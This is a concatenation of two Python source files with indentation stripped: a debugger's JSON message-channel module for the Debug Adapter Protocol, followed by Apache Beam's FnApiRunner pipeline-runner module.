command = message_dict("command", unicode)
success = message_dict("success", bool)
if body is None:
if success:
body = message_dict("body", _payload)
else:
error_message = message_dict("message", unicode)
exc_type = MessageHandlingError
if error_message.startswith(InvalidMessageError.PREFIX):
error_message = error_message[len(InvalidMessageError.PREFIX) :]
exc_type = InvalidMessageError
body = exc_type(error_message, silent=True)
try:
with channel:
request = channel._sent_requests.pop(request_seq)
known_request = True
except KeyError:
# Synthetic Request that only has seq and command as specified in response
# JSON, for error reporting purposes.
request = OutgoingRequest(channel, request_seq, command, "<unknown>")
known_request = False
if not success:
body.cause = request
response = Response(channel, seq, request, body, json=message_dict)
with channel:
request.response = response
request._enqueue_response_handlers()
if known_request:
return response
else:
raise response.isnt_valid(
"request_seq={0} does not match any known request", request_seq
)
class Disconnect(Message):
"""A dummy message used to represent disconnect. It's always the last message
received from any channel.
"""
def __init__(self, channel):
super(Disconnect, self).__init__(channel, None)
def describe(self):
return fmt("disconnect from {0}", self.channel)
class MessageHandlingError(Exception):
"""Indicates that a message couldn't be handled for some reason.
If the reason is a contract violation - i.e. the message that was handled did not
conform to the protocol specification - InvalidMessageError, which is a subclass,
should be used instead.
If any message handler raises an exception not derived from this class, it will
escape the message loop unhandled, and terminate the process.
If any message handler raises this exception, but applies_to(message) is False, it
is treated as if it were a generic exception, as described above. Thus, if a request
handler issues another request of its own, and that one fails, the failure is not
silently propagated. However, a request that is delegated via Request.delegate()
will also propagate failures back automatically. For manual propagation, catch the
exception, and call exc.propagate().
If any event handler raises this exception, and applies_to(event) is True, the
exception is silently swallowed by the message loop.
If any request handler raises this exception, and applies_to(request) is True, the
exception is silently swallowed by the message loop, and a failure response is sent
with "message" set to str(reason).
Note that, while errors are not logged when they're swallowed by the message loop,
by that time they have already been logged by their __init__ (when instantiated).
"""
def __init__(self, reason, cause=None, silent=False):
"""Creates a new instance of this class, and immediately logs the exception.
Message handling errors are logged immediately unless silent=True, so that the
precise context in which they occurred can be determined from the surrounding
log entries.
"""
self.reason = reason
"""Why it couldn't be handled. This can be any object, but usually it's either
str or Exception.
"""
assert cause is None or isinstance(cause, Message)
self.cause = cause
"""The Message object for the message that couldn't be handled. For responses
to unknown requests, this is a synthetic Request.
"""
if not silent:
try:
raise self
except MessageHandlingError:
log.exception()
def __hash__(self):
return hash((self.reason, id(self.cause)))
def __eq__(self, other):
if not isinstance(other, MessageHandlingError):
return NotImplemented
if type(self) is not type(other):
return NotImplemented
if self.reason != other.reason:
return False
if self.cause is not None and other.cause is not None:
if self.cause.seq != other.cause.seq:
return False
return True
def __ne__(self, other):
return not self == other
def __str__(self):
return str(self.reason)
def __repr__(self):
s = type(self).__name__
if self.cause is None:
s += fmt("(reason={0!r})", self.reason)
else:
s += fmt(
"(channel={0!r}, cause={1!r}, reason={2!r})",
self.cause.channel.name,
self.cause.seq,
self.reason,
)
return s
def applies_to(self, message):
"""Whether this MessageHandlingError can be treated as a reason why the
handling of message failed.
If self.cause is None, this is always true.
If self.cause is not None, this is only true if cause is message.
"""
return self.cause is None or self.cause is message
def propagate(self, new_cause):
"""Propagates this error, raising a new instance of the same class with the
same reason, but a different cause.
"""
raise type(self)(self.reason, new_cause, silent=True)
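# Illustrative sketch of manual propagation: a handler that re-issues the
# failed operation against another channel (both "forward_request" and
# "other_channel" are hypothetical) can surface the failure on the original
# request it was handling:
#
#     def forward_request(self, request):
#         try:
#             return other_channel.request(request.command, request.arguments)
#         except MessageHandlingError as exc:
#             exc.propagate(request)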
class InvalidMessageError(MessageHandlingError):
"""Indicates that an incoming message did not follow the protocol specification -
for example, it was missing properties that are required, or the message itself
is not allowed in the current state.
Raised by MessageDict in lieu of KeyError for missing keys.
"""
PREFIX = "Invalid message: "
"""Automatically prepended to the "message" property in JSON responses, when the
handler raises InvalidMessageError.
If a failed response has "message" property that starts with this prefix, it is
reported as InvalidMessageError rather than MessageHandlingError.
"""
def __str__(self):
return InvalidMessageError.PREFIX + str(self.reason)
class JsonMessageChannel(object):
"""Implements a JSON message channel on top of a raw JSON message stream, with
support for DAP requests, responses, and events.
The channel can be locked for exclusive use via the with-statement::
with channel:
channel.send_request(...)
# No interleaving messages can be sent here from other threads.
channel.send_event(...)
"""
def __init__(self, stream, handlers=None, name=None):
self.stream = stream
self.handlers = handlers
self.name = name if name is not None else stream.name
self._lock = threading.RLock()
self._closed = False
self._seq_iter = itertools.count(1)
self._sent_requests = {} # {seq: Request}
self._handler_queue = [] # [(what, handler)]
self._handlers_enqueued = threading.Condition(self._lock)
self._handler_thread = None
self._parser_thread = None
def __str__(self):
return self.name
def __repr__(self):
return fmt("{0}({1!r})", type(self).__name__, self.name)
def __enter__(self):
self._lock.acquire()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self._lock.release()
def close(self):
"""Closes the underlying stream.
This does not immediately terminate any handlers that are already executing,
but they will be unable to respond. No new request or event handlers will
execute after this method is called, even for messages that have already been
received. However, response handlers will continue to execute for any request
that is still pending, as will any handlers registered via on_response().
"""
with self:
if not self._closed:
self._closed = True
self.stream.close()
def start(self):
"""Starts a message loop which parses incoming messages and invokes handlers
for them on a background thread, until the channel is closed.
Incoming messages, including responses to requests, will not be processed at
all until this is invoked.
"""
self._parser_thread = threading.Thread(
target=self._parse_incoming_messages, name=fmt("{0} message parser", self)
)
self._parser_thread.pydev_do_not_trace = True
self._parser_thread.is_pydev_daemon_thread = True
self._parser_thread.daemon = True
self._parser_thread.start()
def wait(self):
"""Waits for the message loop to terminate, and for all enqueued Response
message handlers to finish executing.
"""
parser_thread = self._parser_thread
if parser_thread is not None:
parser_thread.join()
handler_thread = self._handler_thread
if handler_thread is not None:
handler_thread.join()
# Order of keys for _prettify() - follows the order of properties in
# https://microsoft.github.io/debug-adapter-protocol/specification
_prettify_order = (
"seq",
"type",
"request_seq",
"success",
"command",
"event",
"message",
"arguments",
"body",
"error",
)
def _prettify(self, message_dict):
"""Reorders items in a MessageDict such that it is more readable.
"""
for key in self._prettify_order:
if key not in message_dict:
continue
value = message_dict[key]
del message_dict[key]
message_dict[key] = value
@contextlib.contextmanager
def _send_message(self, message):
"""Sends a new message to the other party.
Generates a new sequence number for the message, and provides it to the
caller before the message is sent, using the context manager protocol::
with send_message(...) as seq:
# The message hasn't been sent yet.
...
# Now the message has been sent.
Safe to call concurrently for the same channel from different threads.
"""
assert "seq" not in message
with self:
seq = next(self._seq_iter)
message = MessageDict(None, message)
message["seq"] = seq
self._prettify(message)
with self:
yield seq
self.stream.write_json(message)
def send_request(self, command, arguments=None, on_before_send=None):
"""Sends a new request, and returns the OutgoingRequest object for it.
If arguments is None or {}, "arguments" will be omitted in JSON.
If on_before_send is not None, invokes on_before_send() with the request
object as the sole argument, before the request actually gets sent.
Does not wait for response - use OutgoingRequest.wait_for_response().
Safe to call concurrently for the same channel from different threads.
"""
d = {"type": "request", "command": command}
if arguments is not None and arguments != {}:
d["arguments"] = arguments
with self._send_message(d) as seq:
request = OutgoingRequest(self, seq, command, arguments)
if on_before_send is not None:
on_before_send(request)
self._sent_requests[seq] = request
return request
def send_event(self, event, body=None):
"""Sends a new event.
If body is None or {}, "body" will be omitted in JSON.
Safe to call concurrently for the same channel from different threads.
"""
d = {"type": "event", "event": event}
if body is not None and body != {}:
d["body"] = body
with self._send_message(d):
pass
def request(self, *args, **kwargs):
"""Same as send_request(...).wait_for_response()
"""
return self.send_request(*args, **kwargs).wait_for_response()
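# Illustrative round-trip (the command and arguments are hypothetical):
#
#     body = channel.request("evaluate", {"expression": "1 + 1"})
#
# is equivalent to:
#
#     request = channel.send_request("evaluate", {"expression": "1 + 1"})
#     body = request.wait_for_response()   # raises the error body on failure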
def propagate(self, message):
"""Sends a new message with the same type and payload.
If it was a request, returns the new OutgoingRequest object for it.
"""
assert message.is_request() or message.is_event()
if message.is_request():
return self.send_request(message.command, message.arguments)
else:
self.send_event(message.event, message.body)
def delegate(self, message):
"""Like propagate(message).wait_for_response(), but will also propagate
any resulting MessageHandlingError back.
"""
try:
result = self.propagate(message)
if result.is_request():
result = result.wait_for_response()
return result
except MessageHandlingError as exc:
exc.propagate(message)
def _parse_incoming_messages(self):
log.debug("Starting message loop for channel {0}", self)
try:
while True:
self._parse_incoming_message()
except NoMoreMessages as exc:
log.debug("Exiting message loop for channel {0}: {1}", self, exc)
with self:
# Generate dummy responses for all outstanding requests.
err_message = compat.force_unicode(str(exc), "utf-8", errors="replace")
# Response._parse() will remove items from _sent_requests, so
# make a snapshot before iterating.
sent_requests = list(self._sent_requests.values())
for request in sent_requests:
response_json = MessageDict(
None,
{
"seq": -1,
"request_seq": request.seq,
"command": request.command,
"success": False,
"message": err_message,
},
)
Response._parse(self, response_json, body=exc)
assert not len(self._sent_requests)
self._enqueue_handlers(Disconnect(self), self._handle_disconnect)
self.close()
_message_parsers = {
"event": Event._parse,
"request": Request._parse,
"response": Response._parse,
}
def _parse_incoming_message(self):
"""Reads incoming messages, parses them, and puts handlers into the queue
for _run_handlers() to invoke, until the channel is closed.
"""
# Set up a dedicated decoder for this message, to create MessageDict instances
# for all JSON objects, and track them so that they can be later wired up to
# the Message they belong to, once it is instantiated.
def object_hook(d):
d = MessageDict(None, d)
if "seq" in d:
self._prettify(d)
d.associate_with = associate_with
message_dicts.append(d)
return d
# A hack to work around circular dependency between messages, and instances of
# MessageDict in their payload. We need to set message for all of them, but it
# cannot be done until the actual Message is created - which happens after the
# dicts are created during deserialization.
#
# So, upon deserialization, every dict in the message payload gets a method
# that can be called to set MessageDict.message for *all* dicts belonging to
# that message. This method can then be invoked on the top-level dict by the
# parser, after it has parsed enough of the dict to create the appropriate
# instance of Event, Request, or Response for this message.
def associate_with(message):
for d in message_dicts:
d.message = message
del d.associate_with
message_dicts = []
decoder = self.stream.json_decoder_factory(object_hook=object_hook)
message_dict = self.stream.read_json(decoder)
assert isinstance(message_dict, MessageDict) # make sure stream used decoder
msg_type = message_dict("type", json.enum("event", "request", "response"))
parser = self._message_parsers[msg_type]
try:
parser(self, message_dict)
except InvalidMessageError as exc:
log.error(
"Failed to parse message in channel {0}: {1} in:\n{2!j}",
self,
str(exc),
message_dict,
)
except Exception as exc:
if isinstance(exc, NoMoreMessages) and exc.stream is self.stream:
raise
log.exception(
"Fatal error in channel {0} while parsing:\n{1!j}", self, message_dict
)
os._exit(1)
def _enqueue_handlers(self, what, *handlers):
"""Enqueues handlers for _run_handlers() to run.
`what` is the Message being handled, and is used for logging purposes.
If the background thread with _run_handlers() isn't running yet, starts it.
"""
with self:
self._handler_queue.extend((what, handler) for handler in handlers)
self._handlers_enqueued.notify_all()
# If there is anything to handle, but there's no handler thread yet,
# spin it up. This will normally happen only once, on the first call
# to _enqueue_handlers(), and that thread will run all the handlers
# for parsed messages. However, this can also happen if somebody calls
# Request.on_response() - possibly concurrently from multiple threads -
# after the channel has already been closed, and the initial handler
# thread has exited. In this case, we spin up a new thread just to run
# the enqueued response handlers, and it will exit as soon as it's out
# of handlers to run.
if len(self._handler_queue) and self._handler_thread is None:
self._handler_thread = threading.Thread(
target=self._run_handlers, name=fmt("{0} message handler", self)
)
self._handler_thread.pydev_do_not_trace = True
self._handler_thread.is_pydev_daemon_thread = True
self._handler_thread.start()
def _run_handlers(self):
"""Runs enqueued handlers until the channel is closed, or until the handler
queue is empty once the channel is closed.
"""
while True:
with self:
closed = self._closed
if closed:
# Wait for the parser thread to wrap up and enqueue any remaining
# handlers, if it is still running.
self._parser_thread.join()
# From this point on, _enqueue_handlers() can only get called
# from Request.on_response().
with self:
if not closed and not len(self._handler_queue):
# Wait for something to process.
self._handlers_enqueued.wait()
# Make a snapshot before releasing the lock.
handlers = self._handler_queue[:]
del self._handler_queue[:]
if closed and not len(handlers):
# Nothing to process, channel is closed, and parser thread is
# not running anymore - time to quit! If Request.on_response()
# needs to call _enqueue_handlers() later, it will spin up
# a new handler thread.
self._handler_thread = None
return
for what, handler in handlers:
# If the channel is closed, we don't want to process any more events
# or requests - only responses and the final disconnect handler. This
# is to guarantee that if a handler calls close() on its own channel,
# the corresponding request or event is the last thing to be processed.
if closed and handler in (Event._handle, Request._handle):
continue
with log.prefixed("[handling {0}]\n", what.describe()):
try:
handler()
except Exception:
# It's already logged by the handler, so just fail fast.
self.close()
os._exit(1)
def _get_handler_for(self, type, name):
"""Returns the handler for a message of a given type.
"""
for handler_name in (name + "_" + type, type):
try:
return getattr(self.handlers, handler_name)
except AttributeError:
continue
raise AttributeError(
fmt(
"Channel {0} has no handler for {1} {2!r}",
compat.srcnameof(self.handlers),
type,
name,
)
)
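# Resolution sketch (handler names follow the scheme above; the command and
# event names are hypothetical): for an incoming "initialize" request, this
# returns handlers.initialize_request if present, else handlers.request; for
# a "stopped" event, it returns handlers.stopped_event, else handlers.event.
#
#     class Handlers(object):
#         def initialize_request(self, request): ...
#         def request(self, request): ...          # generic request fallback
#         def event(self, event): ...              # generic event fallback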
def _handle_disconnect(self):
handler = getattr(self.handlers, "disconnect", lambda: None)
try:
handler()
except Exception:
raise log.exception(
"Handler {0}\ncouldn't handle disconnect from {1}:",
compat.srcnameof(handler),
self,
)
class MessageHandlers(object):
"""A simple delegating message handlers object for use with JsonMessageChannel.
For every argument provided, the object gets an attribute with the corresponding
name and value.
"""
def __init__(self, **kwargs):
for name, func in kwargs.items():
setattr(self, name, func)
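# End-to-end wiring sketch. The stream object is hypothetical - anything that
# provides the name, read_json, write_json, json_decoder_factory, and close
# members used by JsonMessageChannel above will do; the handler functions are
# illustrative:
#
#     def initialize_request(request):
#         return {"supportsConfigurationDoneRequest": True}
#
#     handlers = MessageHandlers(
#         initialize_request=initialize_request,
#         request=lambda request: {},          # generic fallback for requests
#         event=lambda event: None,            # generic fallback for events
#     )
#     channel = JsonMessageChannel(stream, handlers, name="example")
#     channel.start()
#     channel.wait()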
fn_api_runner.py
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import itertools
import logging
import os
import queue
import subprocess
import sys
import threading
import time
import uuid
from builtins import object
from concurrent import futures
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import metric
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricResult
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner_transforms import create_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import only_element
from apache_beam.runners.portability.fn_api_runner_transforms import split_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import unique_name
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.sdk_worker import _Future
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.transforms import environments
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindow
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
from apache_beam.utils import windowed_value
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
# State caching is enabled in the fn_api_runner for testing, except for one
# test which runs without state caching (FnApiRunnerTestWithDisabledCaching).
# The cache is disabled in production for other runners.
STATE_CACHE_SIZE = 100
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
self._push_queue = queue.Queue()
self._input = None
self._futures_by_id = dict()
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
def push(self, req):
if req == BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
return self._push_queue.get()
def set_input(self, input):
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
_DONE_MARKER = object()
def __init__(self):
self._lock = threading.Lock()
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
# The following self._req_* variables are used for debugging purposes; data
# is added to them only when self._log_req is True.
self._req_sent = collections.defaultdict(int)
self._req_worker_mapping = {}
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(ControlConnection)
def get_conn_by_worker_id(self, worker_id):
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self, iterator, context):
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
raise RuntimeError('All workers communicating through gRPC should have '
'a worker_id. Received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
self._state = self.DONE_STATE
logging.debug('Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
logging.debug('Runner: Requests multiplexing info: %s',
[(str(req), worker) for req, worker
in self._req_worker_mapping.items()])
class _ListBuffer(list):
"""Used to support parititioning of a list."""
def partition(self, n):
return [self[k::n] for k in range(n)]
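# partition() is a simple round-robin slicing of the buffered pages, e.g.
# (values are illustrative):
#
#     _ListBuffer([b'a', b'b', b'c', b'd', b'e']).partition(2)
#     # -> [[b'a', b'c', b'e'], [b'b', b'd']]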
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
self._grouped_output = None
def append(self, elements_data):
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing
else windowed_key_value.with_value(value))
def partition(self, n):
""" It is used to partition _GroupingBuffer to N parts. Once it is
partitioned, it would not be re-partitioned with diff N. Re-partition
is not supported now.
"""
if not self._grouped_output:
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(
None,
timestamp=GlobalWindow().max_timestamp(),
pane_info=windowed_value.PaneInfo(
is_first=True,
is_last=True,
timing=windowed_value.PaneInfoTiming.ON_TIME,
index=0,
nonspeculative_index=0)).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
# TODO(pabloem, BEAM-7514): Trigger driver needs access to the clock
# note that this only comes through if windowing is default - but what
# about having multiple firings on the global window.
# May need to revise.
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
self._grouped_output = [[] for _ in range(n)]
output_stream_list = []
for _ in range(n):
output_stream_list.append(create_OutputStream())
for idx, (encoded_key, windowed_values) in enumerate(self._table.items()):
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream_list[idx % n], True)
for ix, output_stream in enumerate(output_stream_list):
self._grouped_output[ix] = [output_stream.get()]
self._table = None
return self._grouped_output
def __iter__(self):
""" Since partition() returns a list of lists, add this __iter__ to return
a list to simplify code when we need to iterate through ALL elements of
_GroupingBuffer.
"""
return itertools.chain(*self.partition(1))
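# Typical lifecycle sketch (the coders and windowing come from the stage
# being executed; the names below are illustrative):
#
#     buf = _GroupingBuffer(pre_gbk_coder, post_gbk_coder, windowing)
#     buf.append(encoded_kv_page)          # one call per page of encoded KVs
#     parts = buf.partition(num_workers)   # n lists of encoded output pages
#     buf.append(more_data)                # would raise RuntimeError now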
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(self, access_pattern, coder):
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn:
self._kv_extrator = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('')
self._value_coder = coder.wrapped_value_coder
elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn:
self._kv_extrator = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (
coder.wrapped_value_coder.value_coder())
else:
raise ValueError(
"Unknown access pattern: '%s'" % access_pattern.urn)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(list)
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_value = self._windowed_value_coder.get_impl(
).decode_from_stream(input_stream, True)
key, value = self._kv_extrator(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
class FnApiRunner(runner.PipelineRunner):
def __init__(
self,
default_environment=None,
bundle_repeat=0,
use_state_iterables=False,
provision_info=None,
progress_request_frequency=None):
"""Creates a new Fn API Runner.
Args:
default_environment: the default environment to use for UserFns.
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
use_state_iterables: Intentionally split gbk iterables over state API
(for testing)
provision_info: provisioning info to make available to workers, or None
progress_request_frequency: The frequency (in seconds) that the runner
waits before requesting progress from the SDK.
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._default_environment = (
default_environment
or environments.EmbeddedPythonEnvironment())
self._bundle_repeat = bundle_repeat
self._num_workers = 1
self._progress_frequency = progress_request_frequency
self._profiler_factory = None
self._use_state_iterables = use_state_iterables
self._provision_info = provision_info or ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
job_id='unknown-job-id',
job_name='unknown-job-name',
retrieval_token='unused-retrieval-token'))
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self, pipeline, options):
RuntimeValueProvider.set_runtime_options({})
# Setup "beam_fn_api" experiment options if lacked.
experiments = (options.view_as(pipeline_options.DebugOptions).experiments
or [])
if 'beam_fn_api' not in experiments:
experiments.append('beam_fn_api')
options.view_as(pipeline_options.DebugOptions).experiments = experiments
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
# TODO: Move group_by_key_input_visitor() to a non-dataflow specific file.
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._num_workers = options.view_as(
pipeline_options.DirectOptions).direct_num_workers or self._num_workers
self._profiler_factory = profiler.Profile.factory_from_options(
options.view_as(pipeline_options.ProfilingOptions))
if 'use_sdf_bounded_source' in experiments:
pipeline.replace_all(DataflowRunner._SDF_PTRANSFORM_OVERRIDES)
self._latest_run_result = self.run_via_runner_api(pipeline.to_runner_api(
default_environment=self._default_environment))
return self._latest_run_result
def run_via_runner_api(self, pipeline_proto):
stage_context, stages = self.create_stages(pipeline_proto)
# TODO(pabloem, BEAM-7514): Create a watermark manager (that has access to
# the teststream (if any), and all the stages).
return self.run_stages(stage_context, stages)
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output(
['git', 'rev-parse', '--abbrev-ref', 'HEAD']
).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
logging.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-import
if not subprocess.call([
sys.executable, '-m', 'gprof2dot',
'-f', 'pstats', path, '-o', path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print('CPU Profile rendering at file://%s.svg'
% os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(self, pipeline_proto):
return fn_api_runner_transforms.create_and_optimize_stages(
copy.deepcopy(pipeline_proto),
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.expand_gbk,
fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.impulse_to_input,
fn_api_runner_transforms.inject_timer_pcollections,
fn_api_runner_transforms.sort_stages,
fn_api_runner_transforms.window_pcollection_coders],
known_runner_urns=frozenset([
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn]),
use_state_iterables=self._use_state_iterables)
def run_stages(self, stage_context, stages):
"""Run a list of topologically-sorted stages in batch mode.
Args:
stage_context (fn_api_runner_transforms.TransformContext)
stages (list[fn_api_runner_transforms.Stage])
"""
worker_handler_manager = WorkerHandlerManager(
stage_context.components.environments, self._provision_info)
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(_ListBuffer)
for stage in stages:
stage_results = self._run_stage(
worker_handler_manager.get_worker_handlers,
stage_context.components,
stage,
pcoll_buffers,
stage_context.safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
worker_handler_manager.close_all()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def _store_side_inputs_in_state(self,
worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders):
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
transform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
worker_handler.state.append_raw(state_key, elements_data)
def _run_bundle_multiple_times_for_testing(
self, worker_handler_list, process_bundle_descriptor, data_input,
data_output, get_input_coder_callable, cache_token_generator):
# all workers share state, so use any worker_handler.
worker_handler = worker_handler_list[0]
for k in range(self._bundle_repeat):
try:
worker_handler.state.checkpoint()
testing_bundle_manager = ParallelBundleManager(
worker_handler_list, lambda pcoll_id: [],
get_input_coder_callable, process_bundle_descriptor,
self._progress_frequency, k,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator
)
testing_bundle_manager.process_bundle(data_input, data_output)
finally:
worker_handler.state.restore()
